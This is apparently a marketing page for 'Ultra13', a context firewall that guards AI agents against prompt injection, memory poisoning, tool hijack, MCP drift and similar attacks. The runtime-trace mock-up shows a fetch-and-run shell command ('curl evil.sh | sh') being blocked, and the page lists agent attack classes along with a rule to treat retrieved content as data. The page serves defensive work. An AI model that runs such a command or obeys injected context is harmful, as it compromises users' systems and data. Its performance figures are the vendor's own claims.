A context firewall for AI agents that actually do things.

Your agents read hostile context, remember it, call tools, and touch real systems. Ultra13 sits at that boundary and decides what context is allowed to influence what action.

Treat prompts, RAG chunks, tickets, emails, memory, MCP responses, and tool output as separate trust zones.
Control which sources can influence which actions before the agent calls tools, writes memory, or exposes data.
Use offensive teardowns to prove the firewall closes real exploit paths, not just suspicious strings.

See how the firewall works Book a teardown

runtime trace

live

Untrusted input

user message · web page · email · ticket

trust: untrusted

Retrieved context · MCP · memory

RAG chunks, tool descriptions, stored state

source: externalmcp:response

Agent reasoning loop

plan → select tool → act → observe

Tool call · API · DB · browser · shell

shell.exec(cmd)

args: "curl evil.sh | sh"

Ultra13 Context Firewall

decision

ALLOWBLOCKREQUIRE APPROVALREDACTQUARANTINE

BLOCK · source-to-sink: external → shell.exec denied · context is evidence, not instruction

Exploit closed

re-tested · 0 reproductions

The missing layer

Agents fail at the context boundary.

Prompt injection is only the visible symptom. The deeper problem is that agents mix trusted instructions, untrusted content, retrieved data, tool output, and memory in the same reasoning loop. Then they act on it.

failure mode

A document becomes an instruction

A retrieved policy, ticket, web page, or MCP response tells the agent to ignore its rules, leak data, or call a tool differently.

failure mode

Memory becomes a backdoor

A poisoned memory entry survives the session and quietly steers the next user, workflow, or agent handoff.

failure mode

A tool result becomes authority

The agent treats untrusted output as permission to browse, export, execute, approve, or delegate.

What Ultra13 does

Control the path from context to action.

A prompt filter asks, “does this text look bad?” A context firewall asks the more useful question: “should this source be allowed to influence this action?”

Explore the firewall See proof report

Label

Mark every context span by source, tenant, trust level, freshness, and whether it is allowed to instruct the agent.

Gate

Decide whether that source can affect a specific sink: tool call, memory write, retrieval result, API request, workflow action, or final answer.

Enforce

Allow, block, redact, quarantine, or require approval before unsafe context becomes an unsafe action.

Prove

Replay the exploit with the firewall off and on so buyers can see what changed and why the path is closed.

Runtime enforcement

Not another system prompt. A policy boundary.

Ultra13 wraps the agent loop where context enters, memory is recalled, tools are called, and outputs leave. The firewall can run in monitor mode first, then enforce once the policy is proven.

Context provenance & trust

Tag every recalled, tool-result, and retrieved span — and instruct the model to treat withheld content as data, never commands.

Source-to-sink policy

Declare which context classes may influence which actions — external content can answer, but can't authorize an export.

Ingress injection screening

Deterministic detectors first, then a purpose-built specialist classifier on what passes — catching override, jailbreak, and exfiltration directives. Quarantine, don't drop; fail-open.

Egress DLP

Stop secrets, Luhn-validated cards, mod-97 IBANs, and PII in tool args and the model's own prose — redact, tokenize + vault, or block.

Insecure-output defang

Neutralize shell, SQL, and script constructs the model emits toward a sink.

Tool-call inspection

Inspect name, arguments, target resource, identity, tenant, and side effects before execution.

MCP tool-integrity

Hash-pin name + description + schema at first enumerate; flag rug-pull drift and cross-namespace shadowing.

Identity & consent

Mint short-lived, scoped per-call tokens (fail-closed) and refuse in-band consent spoofing.

Memory safety

A RAG source-ACL recall gate plus a write-gate that refuses to store a poisoned plant — so a later replay finds nothing.

Agent-to-agent defense

HMAC-sign peer messages with replay protection; a cascade circuit-breaker withholds on unverified upstream output.

Network / SSRF guard

Block metadata, loopback, and link-local destinations — including obfuscated IPs — by default.

Multimodal screening

Decode OCR / EXIF / QR so image-borne instructions hit the same screener as text.

Quotas & rate limits

Per-tenant rate-limit, token-budget, and CIDR enforcement — real volume control, not just detection.

Tamper-evident audit

Every decision in a hash-chained audit log, mapped to SOC 2 / EU AI Act evidence.

Why the teardown exists

Attack first. Then put the firewall where it matters.

The teardown is not the product. It is how we expose the actual context boundary, write the first policy, and prove the exploit path closes when the firewall is on.

Book an agent teardown

offensive coverage

Direct prompt injectionIndirect injection (tool / document)JailbreaksSystem-prompt extractionRAG poisoningMemory poisoningInsecure output handlingTool hijackCommand executionSSRFOAST exfiltrationConfused deputyConsent / approval spoofingCross-agent contaminationCascading multi-agent failureMCP rug-pull / driftTool shadowingMultimodal injectionModel extractionCross-tenant data bleedUnbounded consumption / DoSObfuscation evasion

Proof, not logos

Evidence that the firewall blocked the path.

Security buyers do not need another AI safety claim. They need to see the exploit, the violated context boundary, the policy decision, and the retest result.

33 / 38

attack families neutralized · OFF→ON proof

9 / 10

OWASP ASI Top 10 classes covered

100%

PINT prompt-injection benchmark

1.00 / 1.00 / 0.00

detector precision / recall / false-positive rate

Source-to-sink policy for context → action flows

MCP response and tool-schema drift inspection

Memory write gates and poisoned-memory quarantine

Egress DLP before model output or tool arguments leave the boundary

Approval gates that ignore in-band consent spoofing

Tamper-evident audit trail for security review

Before / after exploit replay

Buyer-ready control matrix and validation report

// teardown → firewall policy → enforced boundary → retest evidence

Where it fits

Point the firewall at the agent workflows with real blast radius.

Pre-launch agent review

Find launch-killing failure modes before your first hostile user does.

Enterprise sales readiness

Walk into security review with evidence, a control matrix, and a retest plan.

MCP / toolchain security review

Validate every tool description, MCP server, and delegated call path.

RAG / memory risk assessment

Prove retrieved content and stored memory can't become standing instruction.

Post-incident investigation

Replay the exploit chain, identify the boundary that failed, and close it.

Continuous regression testing

Re-run the offensive suite after every model, prompt, tool, or policy change.

Intel Centre

Follow the latest Agentic AI Security signals.

The Intel Centre tracks prompt injection, MCP risk, tool misuse, memory poisoning, RAG failures, and context-boundary controls — then translates the news into what agent builders should enforce.

Visit Intel Centre Read latest signals

Give us one agent workflow. We’ll map the context boundary, break it, and show where the firewall stops it.

You get the exploit replay, the firewall policy, and the validation evidence you need before the agent reaches more users or enterprise buyers.

Book Firewall Review See a Sample Report